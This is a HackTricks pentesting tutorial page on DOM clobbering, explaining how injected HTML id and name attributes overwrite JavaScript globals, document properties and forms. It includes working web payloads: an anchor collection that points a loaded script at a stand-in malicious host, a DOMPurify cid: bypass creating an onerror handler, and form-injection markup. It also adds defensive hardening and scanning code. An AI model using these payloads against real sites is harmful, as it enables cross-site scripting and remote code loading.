hacktricks/pentesting-web/xss-cross-site-scripting/dom-clobbering.md
2024-02-11 02:13:58 +00:00

# Dom Clobbering
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? Or do you want access to the **latest version of PEASS or to download HackTricks as PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## **Basics**
It is possible to create **global variables in the JS context** by using the **`id`** and **`name`** attributes on HTML tags.
```html
<form id=x></form>
<script>
console.log(typeof document.x)  // "object"
console.log(String(document.x)) // [object HTMLFormElement]
</script>
```
**Only certain** elements can use the **name attribute** to clobber globals: `embed`, `form`, `iframe`, `image`, `img` and `object` (the HTML parser rewrites an `image` start tag to `img`).
Interestingly, when you use a **form** element to clobber a variable you get the element's own **`toString`** value, `[object HTMLFormElement]`, but with an **anchor** the **`toString`** result is the anchor's **`href`**. So with an **`a` tag** you can **control** the **value** that is produced whenever the variable is used as a **string**:
```html
<a href="controlled string" id=x></a>
<script>
console.log(String(x)) // the anchor's href, i.e. the controlled string (a relative href is resolved against the page URL)
</script>
```
### Arrays and attributes
It is also **possible to clobber arrays** and **object attributes**:
```html
<a id=x>
<a id=x name=y href=controlled>
<script>
console.log(String(x[1])) // controlled (two elements with the same id turn x into an HTMLCollection)
console.log(String(x.y))  // controlled (named item of that collection)
</script>
```
To clobber a **third level** (e.g. `x.y.z`) you need to use a **`form`**:
```html
<form id=x name=y><input id=z value=controlled></form>
<form id=x></form>
<script>
alert(x.y.z.value)//controlled
</script>
```
Going deeper is **harder but still possible**, using iframes:
```html
<iframe name=x srcdoc="<a id=y href=controlled></a>"></iframe>
<style>@import 'https://google.com';</style>
<script>alert(x.y)//controlled</script>
```
{% hint style="warning" %}
The style tag is there to give the iframe enough time to render. Without it you will get an alert of "undefined".
{% endhint %}
To clobber even deeper attributes you can use **iframes with HTML encoding**, one extra layer of entity encoding per nested `srcdoc`, like this:
```html
<iframe name=a srcdoc="<iframe srcdoc='<iframe name=c srcdoc=<a/id=d&amp;amp;#x20;name=e&amp;amp;#x20;href=\controlled&amp;amp;gt;<a&amp;amp;#x20;id=d&amp;amp;gt; name=d>' name=b>"></iframe>
<style>@import 'https://google.com';</style>
<script>
alert(a.b.c.d.e)//controlled
</script>
```
### **Filter bypass**
If a filter iterates over the properties of a node with something like `document.getElementById('x').attributes`, you can **clobber** the **`.attributes`** property and **break the filter**. Other DOM properties such as **`tagName`**, **`nodeName`** or **`parentNode`** can be **clobbered** the same way.
```html
<form id=x></form>
<form id=y>
<input name=nodeName>
</form>
<script>
console.log(document.getElementById('x').nodeName)         // FORM
console.log(String(document.getElementById('y').nodeName)) // [object HTMLInputElement]
</script>
```
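Why this bypass works, and the corresponding defence, as an added example that is not part of the original page. Node has no DOM, so `FakeElement` and `makeForm` below are a constructed stand-in for a `<form>` whose named controls are looked up before the prototype chain, which is what the `HTMLFormElement` named getter does in a browser (its WebIDL is marked `[LegacyOverrideBuiltIns]`). The function names, the `onsubmit` payload and the check logic are mine; in a real browser the prototypes to take the accessors from are `Element.prototype` for `attributes` and `Node.prototype` for `nodeName`.

```javascript
// Added example: a constructed stand-in for a <form> element (not a real DOM).
class FakeElement {
  constructor(tagName, attrs = {}) {
    this._tag = tagName.toUpperCase();
    this._attrs = attrs;
    this._controls = [];
  }
  get nodeName() { return this._tag; }
  get attributes() {
    return Object.entries(this._attrs).map(([name, value]) => ({ name, value }));
  }
}

// A form whose controls are reachable as form.<name|id>, resolved BEFORE the
// prototype chain: the legacy override behaviour that makes clobbering work.
function makeForm(attrs, controls) {
  const form = new FakeElement('form', attrs);
  form._controls = controls;
  return new Proxy(form, {
    get(target, prop, receiver) {
      if (typeof prop === 'string') {
        const hit = target._controls.find(c => c._attrs.name === prop || c._attrs.id === prop);
        if (hit) return hit;
      }
      return Reflect.get(target, prop, receiver);
    },
  });
}

// Naive sanitizer check: trusts whatever node.attributes happens to return.
function naiveHasEventHandler(node) {
  return Array.from(node.attributes).some(a => /^on/i.test(a.name));
}

// Hardened: take the accessor from the prototype and invoke it with the node as `this`,
// so a named control cannot shadow it.
const protoGetter = (proto, name) => Object.getOwnPropertyDescriptor(proto, name).get;
const realAttributes = node => protoGetter(FakeElement.prototype, 'attributes').call(node);
const realNodeName = node => protoGetter(FakeElement.prototype, 'nodeName').call(node);

function hardenedHasEventHandler(node) {
  return realAttributes(node).some(a => /^on/i.test(a.name));
}

// Constructed payload: a form carrying onsubmit, with controls that clobber
// .attributes and .nodeName exactly as in the snippet above.
function clobberedForm() {
  return makeForm({ id: 'y', onsubmit: 'alert(1)' }, [
    new FakeElement('input', { id: 'attributes' }),
    new FakeElement('input', { name: 'nodeName' }),
  ]);
}
```

Against the clobbered form, `node.attributes` yields an `<input>` instead of the attribute list, so the naive walk removes nothing and `onsubmit` survives; reading the getter from the prototype still sees `id` and `onsubmit` and reports `FORM` as the tag name. The same approach covers `tagName`, `parentNode` and `childNodes`.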
## **Clobbering `window.someObject`**
In JavaScript it is common to find:
```javascript
var someObject = window.someObject || {};
```
Controlling HTML on the page lets you overwrite `someObject` with a DOM node, which can introduce security vulnerabilities. For example, you can replace `someObject` with two anchors sharing that id, so that `someObject` becomes an `HTMLCollection` and `someObject.url` is the anchor named `url`, which stringifies to its `href`:
```html
<!-- two anchors with the same id make someObject an HTMLCollection; name=url makes someObject.url the second anchor -->
<a id=someObject><a id=someObject name=url href=//malicious-website.com/malicious.js>
```
in vulnerable code such as:
```html
<script>
window.onload = function(){
let someObject = window.someObject || {};
let script = document.createElement('script');
script.src = someObject.url;
document.body.appendChild(script);
};
</script>
```
This technique abuses the script source to execute attacker-controlled code.
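The vulnerable loader above next to a hardened version, as an added example that is not from the original page. Node has no DOM, so `FakeAnchor` and `FakeCollection` are a constructed stand-in that reproduces only the two facts the attack relies on: an anchor stringifies to its `href`, and two elements sharing an id yield an `HTMLCollection` whose named member (`name=url`) is the second anchor. The origin `https://app.example` and the function names are assumptions for the demo.

```javascript
// Added example: constructed stand-ins for the DOM objects involved (not a real DOM).
class FakeAnchor {
  constructor(href) { this.href = href; }
  // A browser resolves href to an absolute URL; the raw value is kept here.
  toString() { return this.href; }
}
class FakeCollection {}   // stands in for HTMLCollection: its prototype is not Object.prototype

// What <a id=someObject><a id=someObject name=url href=//malicious-website.com/malicious.js>
// leaves on window.
function clobberedWindow() {
  const collection = new FakeCollection();
  collection.url = new FakeAnchor('//malicious-website.com/malicious.js');
  return { someObject: collection };
}

// The loader as written on the page; returns the value script.src would be set to.
function vulnerableScriptSrc(win) {
  const someObject = win.someObject || {};
  return String(someObject.url);
}

// Hardened: require a plain object carrying a string url inside an allow-listed origin.
function hardenedScriptSrc(win, pageOrigin = 'https://app.example') {
  const cfg = win.someObject;
  if (cfg === undefined) return null;
  if (Object.getPrototypeOf(cfg) !== Object.prototype) {
    throw new TypeError('someObject is not a plain object (DOM clobbering?)');
  }
  if (typeof cfg.url !== 'string') {
    throw new TypeError('someObject.url is not a string');
  }
  const resolved = new URL(cfg.url, pageOrigin);
  if (resolved.origin !== pageOrigin) {
    throw new Error(`refusing script from ${resolved.origin}`);
  }
  return resolved.href;
}
```

The prototype check is what stops the clobbered value: an `HTMLCollection` or an anchor element is an object, so a plain truthiness or `typeof` test would pass it, while `Object.getPrototypeOf(cfg) === Object.prototype` only accepts a literal the page's own scripts created. The origin check is independent of clobbering and also rejects a string configuration that was tampered with by other means.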
**Trick**: **`DOMPurify`** lets you use the **`cid:`** protocol, which **does not URL-encode double quotes**. This means you can **inject an encoded double quote that is decoded at runtime**. Injecting something like **`<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`** makes the HTML-encoded `&quot;` be **decoded at runtime**, so when the `href` is later concatenated into markup it **breaks out** of the attribute value and **creates** an **`onerror`** handler.
Another technique uses the **`form`** element. Some client-side libraries inspect the attributes of a newly created form element in order to sanitize them. However, by adding an `input` with `id=attributes` inside the form you overwrite the `attributes` property, preventing the sanitizer from reaching the real attributes.
You can [**find an example of this kind of clobbering in this CTF writeup**](iframes-in-xss-and-csp.md#iframes-in-sop-2).
## Clobbering the document object
According to the specification, attributes of the document object can be overwritten with DOM clobbering:
> The [Document](https://html.spec.whatwg.org/multipage/dom.html#document) interface [supports named properties](https://webidl.spec.whatwg.org/#dfn-support-named-properties). The supported property names of a [Document](https://html.spec.whatwg.org/multipage/dom.html#document) object at any moment consist of the following, in [tree order](https://dom.spec.whatwg.org/#concept-tree-order) according to the element that contributed them, ignoring later duplicates, and with values from [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) attributes coming before values from name attributes when the same element contributes both:
>
> \- The value of the name content attribute for all exposed [embed](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element), [form](https://html.spec.whatwg.org/multipage/forms.html#the-form-element), [iframe](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element), [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element), and exposed [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) elements that have a non-empty name content attribute and are [in a document tree](https://dom.spec.whatwg.org/#in-a-document-tree) with document as their [root](https://dom.spec.whatwg.org/#concept-tree-root);\
> \
> \- The value of the [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute for all exposed [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) elements that have a non-empty [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute and are [in a document tree](https://dom.spec.whatwg.org/#in-a-document-tree) with document as their [root](https://dom.spec.whatwg.org/#concept-tree-root);\
> \
> \- The value of the [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute for all [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element) elements that have both a non-empty [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute and a non-empty name content attribute, and are [in a document tree](https://dom.spec.whatwg.org/#in-a-document-tree) with document as their [root](https://dom.spec.whatwg.org/#concept-tree-root).
Using this technique you can overwrite commonly used **values such as `document.cookie`, `document.body`, `document.children`**, and even methods of the Document interface such as `document.querySelector`.
```javascript
// Console session: each expression is followed by the value the browser returns
document.write("<img name=cookie />")
document.cookie          // <img name="cookie">
typeof(document.cookie)  // 'object'

// Something more sanitizer-friendly than an img tag
document.write("<form name=cookie><input id=toString></form>")
document.cookie          // HTMLCollection(2) [img, form, cookie: img]
typeof(document.cookie)  // 'object'
```
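The rules from the Basics section (which elements put `id` and `name` values on `window`) and the specification text just quoted (which put them on `document`), written out as a scan over an HTML fragment. This is an added example and not code from the original page: start tags are tokenised with regular expressions, which is enough for the payloads on this page but is not an HTML parser (it ignores the "exposed" condition for `embed`/`object` and attribute lists separated by `/` rather than whitespace). For untrusted input, run the check in a real DOM.

```javascript
// Added example: which names an HTML fragment adds to window and to document.
// Regex tokenisation only; not a substitute for a real HTML parser.

const NAMED_ELEMENTS = new Set(['embed', 'form', 'iframe', 'img', 'object']);

const TAG_RE = /<([a-zA-Z][\w-]*)((?:\s+[^\s"'>\/=]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?)*)\s*\/?>/g;
const ATTR_RE = /([^\s"'>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

// Every start tag as {tag, attrs}. The first occurrence of an attribute wins,
// as in the HTML parser, and an <image> start tag is normalised to <img> as the parser does.
function startTags(html) {
  const out = [];
  for (const m of html.matchAll(TAG_RE)) {
    const attrs = Object.create(null);
    for (const a of m[2].matchAll(ATTR_RE)) {
      const name = a[1].toLowerCase();
      if (!(name in attrs)) attrs[name] = a[2] ?? a[3] ?? a[4] ?? '';
    }
    const tag = m[1].toLowerCase();
    out.push({ tag: tag === 'image' ? 'img' : tag, attrs });
  }
  return out;
}

// Names that become properties of window and of document (deduplicated, sorted).
function clobberedNames(html) {
  const win = new Set();
  const doc = new Set();
  for (const { tag, attrs } of startTags(html)) {
    const id = attrs.id ?? '';
    const name = attrs.name ?? '';
    // window: any element with an id, plus the listed elements via name
    if (id) win.add(id);
    if (name && NAMED_ELEMENTS.has(tag)) win.add(name);
    // document (per the quoted spec): name on the listed elements,
    // id on object, and id on img only when the img also carries a name
    if (name && NAMED_ELEMENTS.has(tag)) doc.add(name);
    if (id && tag === 'object') doc.add(id);
    if (id && name && tag === 'img') doc.add(id);
  }
  return { window: [...win].sort(), document: [...doc].sort() };
}

// Names a page's own scripts rely on that the fragment would shadow.
function shadowed(html, relied = { window: [], document: [] }) {
  const got = clobberedNames(html);
  return {
    window: relied.window.filter(n => got.window.includes(n)),
    document: relied.document.filter(n => got.document.includes(n)),
  };
}
```

Run `shadowed(fragment, { window: [...globals your scripts read from window], document: ['cookie', 'body', ...] })` over sanitizer output or over a stored-content sample: anything it returns is a name that markup, not script, would be supplying to your code. Note the asymmetry the spec imposes: `<img id=body>` lands on `window` but not on `document`, while `<img name=cookie>` lands on both.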
## Writing after clobbering an element
The results of **`document.getElementById()`** and **`document.querySelector()`** calls can be changed by injecting an `<html>` or `<body>` tag with the same id attribute. This is how it can be done:
```html
<div style="display:none" id="cdnDomain" class="x">test</div>
<p>
<html id="cdnDomain" class="x">clobbered</html>
<script>
alert(document.getElementById('cdnDomain').innerText); // Clobbered
alert(document.querySelector('.x').innerText); // Clobbered
</script>
```
Furthermore, by using styles to hide the injected `html`/`body` tags, interference from other text in `innerText` can be avoided, which makes the attack more reliable:
```html
<div style="display:none" id="cdnDomain">test</div>
<p>existing text</p>
<html id="cdnDomain">clobbered</html>
<style>
p{display:none;}
</style>
<script>
alert(document.getElementById('cdnDomain').innerText); // Clobbered
</script>
```
Research into SVG revealed that a `<body>` tag can be used just as effectively:
```html
<div style="display:none" id="cdnDomain">example.com</div>
<svg><body id="cdnDomain">clobbered</body></svg>
<script>
alert(document.getElementById('cdnDomain').innerText); // Clobbered
</script>
```
For the HTML tag to work inside SVG in browsers such as Chrome and Firefox, a `<foreignobject>` tag is required:
```html
<div style="display:none" id="cdnDomain">example.com</div>
<svg>
<foreignobject>
<html id="cdnDomain">clobbered</html>
</foreignobject>
</svg>
<script>
alert(document.getElementById('cdnDomain').innerText); // Clobbered
</script>
```
## Clobbering forms
It is possible to add **new elements to a form** simply by **specifying the `form` attribute** on some tags. You can use this to add **new values to a form** and even add a new **submit button** (to be triggered via clickjacking or by some JS `.click()` call):
{% code overflow="wrap" %}
```html
<!--Add a new attribute and a new button to send-->
<textarea form=id-other-form name=info>
";alert(1);//
</textarea>
<button form=id-other-form type="submit" formaction="/edit" formmethod="post">
Click to send!
</button>
```
{% endcode %}
* More `form*` attributes are listed for the [**button element**](https://www.w3schools.com/tags/tag\_button.asp)**.**
## References
* [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
* [https://portswigger.net/web-security/dom-based/dom-clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering)
* Heyes, Gareth. *JavaScript for hackers: Learn to think like a hacker*.